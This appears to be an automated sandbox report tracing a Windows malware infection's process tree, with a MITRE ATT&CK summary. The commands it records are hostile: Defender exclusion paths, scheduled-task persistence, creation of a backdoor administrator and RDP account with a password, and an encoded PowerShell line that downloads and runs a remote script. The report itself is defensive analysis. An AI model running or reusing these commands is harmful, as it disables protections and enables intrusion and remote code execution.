    Command line: C:\Users\Admin\AppData\Local\Temp\7FF2.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    [2] C:\Users\Admin\AppData\Local\Temp\mine.exe (PID 2472)
        Command line: "C:\Users\Admin\AppData\Local\Temp\mine.exe"
        - Executes dropped EXE
        [3] C:\Windows\System32\conhost.exe (PID 2204)
            Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\mine.exe"
            - Suspicious use of AdjustPrivilegeToken
            [4] C:\Windows\System32\cmd.exe (PID 544)
                Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2716)
                    Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                    - Drops file in System32 directory
                    - Suspicious use of AdjustPrivilegeToken
                [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2384)
                    Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                    - Drops file in System32 directory
                    - Suspicious use of AdjustPrivilegeToken
            [4] C:\Windows\System32\cmd.exe (PID 2468)
                Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
                [5] C:\Windows\system32\schtasks.exe (PID 2576)
                    Command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
                    - Creates scheduled task(s)
            [4] C:\Windows\System32\cmd.exe (PID 2996)
                Command line: "cmd" cmd /c "C:\Users\Admin\services32.exe"
                - Loads dropped DLL
                [5] C:\Users\Admin\services32.exe (PID 1840)
                    Command line: C:\Users\Admin\services32.exe
                    - Executes dropped EXE
                    [6] C:\Windows\System32\conhost.exe (PID 3028)
                        Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
                        - Suspicious use of AdjustPrivilegeToken
                        [7] C:\Windows\System32\cmd.exe (PID 2724)
                            Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                            [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2340)
                                Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                            [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3032)
                                Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                        [7] C:\Windows\System32\cmd.exe (PID 2512)
                            Command line: "cmd" cmd /c taskkill /f /PID "2492"
                            [8] C:\Windows\system32\taskkill.exe (PID 2748)
                                Command line: taskkill /f /PID "2492"
                                - Kills process with taskkill
                        [7] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (PID 1504)
                            Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                            [8] C:\Windows\System32\conhost.exe (PID 2308)
                                Command line: "C:\Windows\System32\\conhost.exe" "/sihost32"
    [2] C:\Users\Admin\AppData\Local\Temp\2soft.exe (PID 2552)
        Command line: "C:\Users\Admin\AppData\Local\Temp\2soft.exe"
        - Executes dropped EXE
        [3] C:\Windows\System32\conhost.exe (PID 2100)
            Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2soft.exe"
            [4] C:\Windows\System32\cmd.exe (PID 988)
                Command line: "cmd" cmd /c taskkill /f /PID "1748"
                [5] C:\Windows\system32\taskkill.exe (PID 2072)
                    Command line: taskkill /f /PID "1748"
                    - Kills process with taskkill
            [4] C:\Windows\System32\cmd.exe (PID 2976)
                Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                [5] C:\Windows\system32\schtasks.exe (PID 2760)
                    Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                    - Creates scheduled task(s)

[1] C:\Users\Admin\AppData\Local\Temp\86D6.exe (PID 2288)
    Command line: C:\Users\Admin\AppData\Local\Temp\86D6.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Accesses Microsoft Outlook accounts
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    [2] C:\Windows\SysWOW64\cmd.exe (PID 3008)
        Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\86D6.exe"
        [3] C:\Windows\SysWOW64\timeout.exe (PID 3056)
            Command line: timeout /T 10 /NOBREAK
            - Delays execution with timeout.exe

[1] C:\Users\Admin\AppData\Local\Temp\9374.exe (PID 2508)
    Command line: C:\Users\Admin\AppData\Local\Temp\9374.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe (PID 2616)
    Command line: cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
    [2] C:\Windows\system32\net.exe (PID 2968)
        Command line: net.exe user WgaUtilAcc Ghasar4f5 /del
        [3] C:\Windows\system32\net1.exe (PID 3052)
            Command line: C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del

[1] C:\Windows\System32\cmd.exe (PID 2060)
    Command line: cmd /C net.exe user WgaUtilAcc 79KZSCaz /add
    [2] C:\Windows\system32\net.exe (PID 2140)
        Command line: net.exe user WgaUtilAcc 79KZSCaz /add
        [3] C:\Windows\system32\net1.exe (PID 2160)
            Command line: C:\Windows\system32\net1 user WgaUtilAcc 79KZSCaz /add

[1] C:\Windows\System32\cmd.exe (PID 2796)
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    [2] C:\Windows\system32\net.exe (PID 2192)
        Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
        [3] C:\Windows\system32\net1.exe (PID 2232)
            Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe (PID 2312)
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
    [2] C:\Windows\system32\net.exe (PID 2032)
        Command line: net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD
        [3] C:\Windows\system32\net1.exe (PID 2676)
            Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

[1] C:\Windows\System32\cmd.exe (PID 2664)
    Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    [2] C:\Windows\system32\net.exe (PID 2652)
        Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
        [3] C:\Windows\system32\net1.exe (PID 2256)
            Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe (PID 1124)
    Command line: cmd /C net.exe user WgaUtilAcc 79KZSCaz
    [2] C:\Windows\system32\net.exe (PID 1776)
        Command line: net.exe user WgaUtilAcc 79KZSCaz
        [3] C:\Windows\system32\net1.exe (PID 2984)
            Command line: C:\Windows\system32\net1 user WgaUtilAcc 79KZSCaz

[1] C:\Windows\System32\cmd.exe (PID 2080)
    Command line: cmd.exe /C wmic path win32_VideoController get name
    [2] C:\Windows\System32\Wbem\WMIC.exe (PID 1032)
        Command line: wmic path win32_VideoController get name
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe (PID 3056)
    Command line: cmd.exe /C wmic CPU get NAME
    [2] C:\Windows\System32\Wbem\WMIC.exe (PID 2344)
        Command line: wmic CPU get NAME
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe (PID 1700)
    Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [2] C:\Windows\system32\cmd.exe (PID 2228)
        Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2596)
            Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
            - Blocklisted process makes network request
            - Drops file in Windows directory
            - Modifies data under HKEY_USERS
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\taskeng.exe (PID 1788)
    Command line: taskeng.exe {320A2FDB-ACE3-4454-A007-A86864468DFA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
    [2] C:\Users\Admin\AppData\Roaming\avvfhbw (PID 2428)
        Command line: C:\Users\Admin\AppData\Roaming\avvfhbw
        - Executes dropped EXE

Network
MITRE ATT&CK Enterprise v6
Persistence
- Account Manipulation (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Modify Registry (2)
- Virtualization/Sandbox Evasion (1)